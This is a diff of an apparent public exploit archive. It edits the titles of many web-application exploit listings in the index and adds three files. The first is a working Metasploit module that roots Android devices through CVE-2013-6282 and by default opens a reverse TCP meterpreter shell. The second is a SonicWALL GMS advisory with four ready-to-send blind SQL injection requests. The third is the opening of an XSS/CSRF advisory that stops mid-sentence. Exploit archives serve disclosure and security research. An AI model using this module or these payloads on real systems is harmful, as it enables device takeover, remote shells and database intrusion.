 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0
-6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0
+6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0
-6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - 'forum.php id' SQL Injection",2008-10-26,Hurley,php,webapps,0
+6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0
 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0
 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0
 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0
@ -19748,7 +19749,7 @@ id,file,description,date,author,platform,type,port
 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0
 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0
 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0
-6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0
+6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0
 6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0
 6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0
 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0
@ -20067,7 +20068,7 @@ id,file,description,date,author,platform,type,port
 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0
 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0
-7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
+7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
 7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
@ -20618,7 +20619,7 @@ id,file,description,date,author,platform,type,port
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
-8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
+8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
@ -21422,7 +21423,7 @@ id,file,description,date,author,platform,type,port
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
-9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
+9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0
 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0
@ -23353,7 +23354,7 @@ id,file,description,date,author,platform,type,port
 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0
 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0
 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0
-13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0
+13769,platforms/php/webapps/13769.txt,"CafeEngine 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0
 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0
 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0
 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0
@ -27559,8 +27560,8 @@ id,file,description,date,author,platform,type,port
 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0
 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0
 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0
-25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0
+25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0
-25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0
+25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0
 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0
 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0
 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
@ -28980,9 +28981,9 @@ id,file,description,date,author,platform,type,port
 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0
 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0
-27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0
+27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0
 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
-27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
+27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0
@ -29309,7 +29310,7 @@ id,file,description,date,author,platform,type,port
 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0
 27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0
 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0
-27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0
+27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0
 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injection",2006-05-03,almaster,php,webapps,0
 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0
 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0
@ -29639,7 +29640,7 @@ id,file,description,date,author,platform,type,port
 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0
 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0
 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0
-28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - Myevent.php Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0
+28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0
 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0
 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0
 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0
@ -32192,12 +32193,12 @@ id,file,description,date,author,platform,type,port
 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0
 32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0
-32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
 32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0
 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0
 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
@ -32489,8 +32490,8 @@ id,file,description,date,author,platform,type,port
 32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0
 32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0
 32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0
-32639,platforms/php/webapps/32639.txt,"yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
+32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
-32640,platforms/php/webapps/32640.txt,"yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
+32640,platforms/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0
 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0
 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443
@ -35809,12 +35810,10 @@ id,file,description,date,author,platform,type,port
 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0
 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0
 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
 38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
-38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
+38182,platforms/php/webapps/38182.txt,"tinybrowser - 'type' Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
-38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
+38183,platforms/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,php,webapps,0
-38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
+38184,platforms/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,php,webapps,0
 38184,platforms/php/webapps/38184.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
 38187,platforms/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
@ -36926,3 +36925,8 @@ id,file,description,date,author,platform,type,port
 40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0
 40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0
 40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0
 40973,platforms/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,php,webapps,0
 40974,platforms/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,php,webapps,0
 40976,platforms/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,php,webapps,0
 40977,platforms/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,hardware,webapps,0
 40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
--- a/platforms/android/local/40975.rb
+++ b/platforms/android/local/40975.rb
@ -0,0 +1,81 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'rex'
 class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  include Msf::Post::File
  include Msf::Post::Common
  def initialize(info={})
    super( update_info( info, {
        'Name'           => "Android get_user/put_user Exploit",
        'Description'    => %q{
            This module exploits a missing check in the get_user and put_user API functions
            in the linux kernel before 3.5.5. The missing checks on these functions
            allow an unprivileged user to read and write kernel memory.
                This exploit first reads the kernel memory to identify the commit_creds and
            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
            The exploit was first discovered in the wild in the vroot rooting application.
        },
        'License'        => MSF_LICENSE,
        'Author'         => [
          'fi01',        # libget_user_exploit / libput_user_exploit
          'cubeundcube', # kallsyms_in_memory
          'timwr',       # Metasploit module
        ],
        'References'     =>
        [
          [ 'CVE', '2013-6282' ],
          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
        ],
        'DisclosureDate' => "Sep 06 2013",
        'SessionTypes'   => [ 'meterpreter' ],
        "Platform"       => [ "android", "linux" ],
        'Targets'        => [[ 'Automatic', { }]],
        'Payload'        => { 'Space'    => 2048, },
        'DefaultOptions' =>
        {
          'WfsDelay'     => 120,
          'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
        },
        'DefaultTarget' => 0,
      }
    ))
  end
  def exploit
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
    exploit_data = File.read(local_file, {:mode => 'rb'})
    space = payload_space
    payload_encoded = payload.encoded
    # Substitute the exploit shellcode with our own
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)
    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
        'LibraryFilePath' => local_file,
        'TargetFilePath'  => remote_file,
        'UploadLibrary'   => false,
        'Extension'       => false,
        'SaveToDisk'      => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
 end
--- a/platforms/hardware/webapps/40977.txt
+++ b/platforms/hardware/webapps/40977.txt
@ -0,0 +1,112 @@
 Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection
 Vendor: Dell Inc.
 Product web page: https://www.sonicwall.com/products/sonicwall-gms/
 Affected version: 8.1
                  8.0 SP1 Build 8048.1410
                  Flow Server Virtual Appliance
 Fixed in: 8.2 (VR-2016-01-C0V)
 Summary: Provide your organization, distributed enterprise or managed
 service offering with an intuitive, powerful way to rapidly deploy and
 centrally manage SonicWall solutions, with SonicWall GMS. Get more value
 from your firewall, secure remote access, anti-spam, and backup and recovery
 solutions with enhanced network security monitoring and robust network
 security reporting. By deploying GMS in an enterprise, you can minimize
 administrative overhead by streamlining security appliance deployment
 and policy management.
 Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities.
 Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID',
 'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being
 returned to the user or used in SQL queries. This can be exploited to manipulate
 SQL queries by injecting arbitrary SQL code.
 Tested on: SonicWALL
           MySQL/5.0.96-community-nt
           Apache-Coyote/1.1
           Apache Tomcat 6.0.41
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5388
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php
 Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS
 26.01.2016
 --
 Blind SQL Injection via several parameters:
 - searchBySonicwall (GET)
 - coDomainID (GET)
 - firstChangeOrderID (GET)
 - secondChangeOrderID (GET)
 PoC:
 #1
 GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1
 Host: 127.0.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
 Referer: http://127.0.0.1/sgms/content.jsp
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: en-US,en;q=0.8
 Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
 Connection: close
 #2
 GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1
 Host: 127.0.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
 Referer: http://127.0.0.1/sgms/content.jsp
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: en-US,en;q=0.8
 Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
 Connection: close
 #3
 GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
 X-Requested-With: XMLHttpRequest
 Accept: */*
 Referer: http://127.0.0.1/sgms/viewdiff.jsp
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: en-US,en;q=0.8
 Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
 Connection: close
 #4
 GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
 X-Requested-With: XMLHttpRequest
 Accept: */*
 Referer: http://127.0.0.1/sgms/viewdiff.jsp
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: en-US,en;q=0.8
 Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
 Connection: close
--- a/platforms/hardware/webapps/40978.txt
+++ b/platforms/hardware/webapps/40978.txt
@ -0,0 +1,63 @@
 Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF
 Vendor: Dell Inc.
 Product web page: https://www.sonicwall.com/products/secure-mobile-access/
 Affected version: 8.1 (SSL-VPN)
 Summary: Keep up with the demands of today’s remote workforce. Enable secure
 mobile access to critical apps and data without compromising security. Choose
 from a variety of scalable secure mobile access (SMA) appliances and intuitive
 Mobile Connect apps to fit every size business and budget.
 Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize
 user-supplied input to several parameters. Attackers can exploit this weakness
 to execute arbitrary HTML and script code in a user's browser session. The WAF was
